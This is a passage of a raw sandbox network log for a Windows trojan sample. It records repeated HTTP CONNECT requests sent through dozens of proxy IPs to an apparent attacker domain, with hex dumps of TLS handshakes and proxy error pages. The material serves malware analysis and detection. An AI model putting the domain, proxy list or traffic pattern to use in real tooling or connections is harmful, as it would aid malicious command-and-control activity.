                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.571204901 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:38 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1561192.168.2.854393186.203.163.5356785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.493386030 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1562192.168.2.85454185.14.8.22680805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.520431042 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1563192.168.2.85454091.107.123.18910805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.520560026 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.726938963 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1564192.168.2.854389188.132.222.880805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.521234035 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.694770098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.789135933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1565192.168.2.854503124.160.118.18380805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.538208961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.904232025 CET323INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.8.1
                                                                                Date: Sat, 24 Feb 2024 01:49:42 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 172
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.8.1</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1566192.168.2.85466645.61.188.134444995828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.542385101 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1567192.168.2.850674200.54.22.74805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.550782919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.680064917 CET19INHTTP/1.1 200 OK
                                                                                Feb 23, 2024 14:28:40.687227011 CET394OUTData Raw: 16 03 03 01 85 01 00 01 81 03 03 65 d8 9d 87 a7 c6 e7 02 b1 ac 32 03 77 38 0b 7b 94 dc 9a 8a 95 18 9a d4 27 a9 63 74 06 80 da 02 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                Data Ascii: e2w8{'ct*,+0/$#('=<5/.-+(heygirlisheeverythingyouwantedinaman.com#k\M07zwo|Z?bVuT:}M
                                                                                Feb 23, 2024 14:28:41.207475901 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 d8 9d 88 35 f2 40 51 59 37 69 bb 53 83 04 ab cb ae 75 c4 19 14 8e 07 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 cb 0b 00 10 c7 00
                                                                                Data Ascii: C?e5@QY7iSuDOWNGRD/#00`4ZmQ0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240212203110Z240512203109Z03110/
                                                                                Feb 23, 2024 14:28:41.207484007 CET1286INData Raw: 6d dd 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 03 82 01 01 00 1f 8b 40 68 93 64 2a 2d dc 07 bd 7a 5f 46 c4 ea f2 c8 d7 63 e0 4e cc 42 c7 44 46 d1 17 84 d3 1f 08 47 69 c2 b6 7f dd 9d a0 2d 9e 1b be 1f f8 19 ab ad d9 8d 7d 14 62 f3 40 cf 76 94
                                                                                Data Ascii: m0*H@hd*-z_FcNBDFGi-}b@v*wTJ;dm55inz74|"@,+v?iS't;H%['rBu*q,/aeYXhV
                                                                                Feb 23, 2024 14:28:41.207566977 CET1286INData Raw: 59 02 10 51 5c e3 c0 2b fd b7 06 48 51 7e 09 5e 3f 0f dc a7 fe 97 e7 79 c5 0e 44 89 78 c5 69 59 29 a0 9a 3a 48 36 29 a6 94 93 55 2d b8 47 b5 e9 96 b5 9f 07 cd a6 ab 3e 32 8a c0 86 83 c5 c1 41 c8 9f 2f 35 8e 0d c0 07 7a e1 ac c9 65 b5 cb 8a a7 dd
                                                                                Data Ascii: YQ\+HQ~^?yDxiY):H6)U-G>2A/5zeqae92>z6VWAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?*'>#ZB-z6=`9c*xN!>\
                                                                                Feb 23, 2024 14:28:41.207572937 CET238INData Raw: 06 03 55 1d 23 04 18 30 16 80 14 60 7b 66 1a 45 0d 97 ca 89 50 2f 7d 04 cd 34 a8 ff fc fd 4b 30 60 06 08 2b 06 01 05 05 07 01 01 04 54 30 52 30 25 06 08 2b 06 01 05 05 07 30 01 86 19 68 74 74 70 3a 2f 2f 6f 63 73 70 2e 70 6b 69 2e 67 6f 6f 67 2f
                                                                                Data Ascii: U#0`{fEP/}4K0`+T0R0%+0http://ocsp.pki.goog/gsr10)+0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+y
                                                                                Feb 23, 2024 14:28:41.500484943 CET594INData Raw: 02 05 03 03 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 03 82 01 01 00 34 a4 1e b1 28 a3 d0 b4 76 17 a6 31 7a 21 e9 d1 52 3e c8 db 74 16 41 88 b8 3d 35 1d ed e4 ff 93 e1 5c 5f ab bb ea 7c cf db e4 0d d1 8b 57 f2 26 6f 5b be 17 46 68 94 37 6f 6b
                                                                                Data Ascii: 0*H4(v1z!R>tA=5\_|W&o[Fh7okz7%QhIZ#+IjuXHW5oo*Ni-h+s"7fIUg2&p=gm=|42njoK;7D~lF!fUl)f[w
                                                                                Feb 23, 2024 14:28:41.751712084 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 89 47 5c 8d f2 d6 27 a4 51 81 91 cd ee 3b ad e1 c6 da 79 12 c5 7e b1 ab 57 38 ab 86 7c 52 75 00 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 72 28 96 03 cd 6d 02 b6 1f b2 dd 73 15 ab aa 01 ec 34 ff 79 22
                                                                                Data Ascii: %! G\'Q;y~W8|Ru(r(ms4y"m8!
                                                                                Feb 23, 2024 14:28:42.583837032 CET258INData Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 1e 00 c0 17 12 68 93 04 10 eb 64 a7 dd 43 1d f9 5a 82 d5 b1 3f d5 e3 56 c4 69 f7 a9 a2 53 6d 87 1d a5 61 d4 d9 5a 77 d3 3c 44 86 6a 64 19 62 22 c2 78 30 a7 27 26 5b bc 07 c9 11 dc fa 55 c6 d4 51 77 98 26 53 cf
                                                                                Data Ascii: hdCZ?ViSmaZw<Djdb"x0'&[UQw&SzFkq1r%Ccf0:Cb3(K8+SYTO,TvI'B1F/>< pWO$_([DP
                                                                                Feb 23, 2024 14:28:44.274337053 CET147OUTData Raw: 17 03 03 00 8e 00 00 00 00 00 00 00 01 a9 5a b9 ef 37 2a ca cc 24 75 de cd 80 c3 b6 ab 54 67 a7 19 40 22 b8 1d 42 8c 91 eb 7c 9e e0 c8 c3 93 dc 43 31 00 2c af 9d 56 65 ef 39 c8 e3 b6 c7 f5 03 a5 b6 8a 11 bb 89 42 ba a2 14 6e 06 c8 49 4a 07 18 83
                                                                                Data Ascii: Z7*$uTg@"B|C1,Ve9BnIJ}^ZBW+.0zZ>{)wA^57H&<,l;Qn
                                                                                Feb 23, 2024 14:28:45.159329891 CET1286INData Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 ba c2 d5 44 fe fe 6d c4 38 2c e3 ad fa ba 8b 2f fb c1 8a 0a 5f d4 25 ee 00 72 00 08 fb 86 8b 2a c8 df ae 3b 18 1c 20 36 bd b1 3e 40 99 e2 75 bb a0 d5 9f 66 d2 c2 f8 3f ae 5c 04 1b 10 b8 69 53 c2 7a 0b 9b ec
                                                                                Data Ascii: qDm8,/_%r*; 6>@uf?\iSz6hysS/aoO!^`tGSTeb}m3S&ISnrR<UGv`UKDQUe^!K%OBo 4yFSi48z\%[*Cb


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1568192.168.2.85464713.38.176.10431285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.635276079 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.802545071 CET146INHTTP/1.1 200 OK
                                                                                Date: Fri, 23 Feb 2024 13:28:38 GMT
                                                                                Content-Type: text/plain
                                                                                X-Powered-By: PHP/5.4.7
                                                                                Server: squid/4.10
                                                                                Content-Length: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1569192.168.2.85061581.91.139.7680805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.639657974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.924083948 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1570192.168.2.854668147.182.195.54307275828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.653554916 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1571192.168.2.85457785.172.60.20211815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.669720888 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1572192.168.2.85452420.219.178.12131295828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.669902086 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.960768938 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1573192.168.2.85073792.204.136.149166865828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.670169115 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.757230997 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.789026022 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1574192.168.2.85466451.83.135.3528465828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.691950083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1575192.168.2.854555200.85.137.141535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.692337990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1576192.168.2.85450836.64.238.8210805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.692715883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1577192.168.2.85458495.56.254.13931285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.712670088 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.552556992 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1578192.168.2.85459820.210.113.32805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.712707043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.975482941 CET319INHTTP/1.1 403 Forbidden
                                                                                Server: squid
                                                                                Mime-Version: 1.0
                                                                                Date: Fri, 23 Feb 2024 13:28:38 GMT
                                                                                Content-Type: text/html;charset=utf-8
                                                                                Content-Length: 17
                                                                                X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                X-Cache: MISS from cdn-fintech.info
                                                                                X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                Connection: keep-alive
                                                                                Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                Data Ascii: ERR_ACCESS_DENIED


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1579192.168.2.8545438.219.97.248805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.722701073 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.054527044 CET743INHTTP/1.1 502 Bad Gateway
                                                                                Server: Tengine
                                                                                Date: Fri, 23 Feb 2024 13:28:38 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 596
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 20 53 6f 72 72 79 20 66 6f 72 20 74 68 65 20 69 6e 63 6f 6e 76 65 6e 69 65 6e 63 65 2e 3c 62 72 2f 3e 0d 0a 50 6c 65 61 73 65 20 72 65 70 6f 72 74 20 74 68 69 73 20 6d 65 73 73 61 67 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 6f 20 75 73 2e 3c 62 72 2f 3e 0d 0a 54 68 61 6e 6b 20 79 6f 75 20 76 65 72 79 20 6d 75 63 68 21 3c 2f 70 3e 0d 0a 3c 74 61 62 6c 65 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 55 52 4c 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 68 74 74 70 3a 2f 2f 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 53 65 72 76 65 72 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 69 7a 74 34 6e 66 33 77 73 39 30 37 62 63 79 6e 6a 71 6e 77 77 38 7a 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 44 61 74 65 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 32 30 32 34 2f 30 32 2f 32 33 20 32 31 3a 32 38 3a 33 38 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 2f 74 61 62 6c 65 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center> Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http://heygirlisheeverythingyouwantedinaman.com</td></tr><tr><td>Server:</td><td>izt4nf3ws907bcynjqnww8z</td></tr><tr><td>Date:</td><td>2024/02/23 21:28:38</td></tr></table><hr/>Powered by Tengine<hr><center>tengine</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1580192.168.2.85444798.162.25.7316535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.723501921 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1581192.168.2.850639103.116.174.12556785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.725274086 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1582192.168.2.850858141.94.174.6350725828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.728773117 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.254882097 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.858709097 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1583192.168.2.850819161.97.163.52296315828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.737390995 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.882514000 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.992089033 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:50.991719961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:02.991574049 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:15.085329056 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:27.085323095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1584192.168.2.854586188.166.197.12931285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.737682104 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1585192.168.2.8544918.209.255.1331285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.738087893 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.877666950 CET38INHTTP/1.1 200 OK
                                                                                content-length: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1586192.168.2.854614106.105.218.244805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.739315033 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1587192.168.2.854455117.160.250.133805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
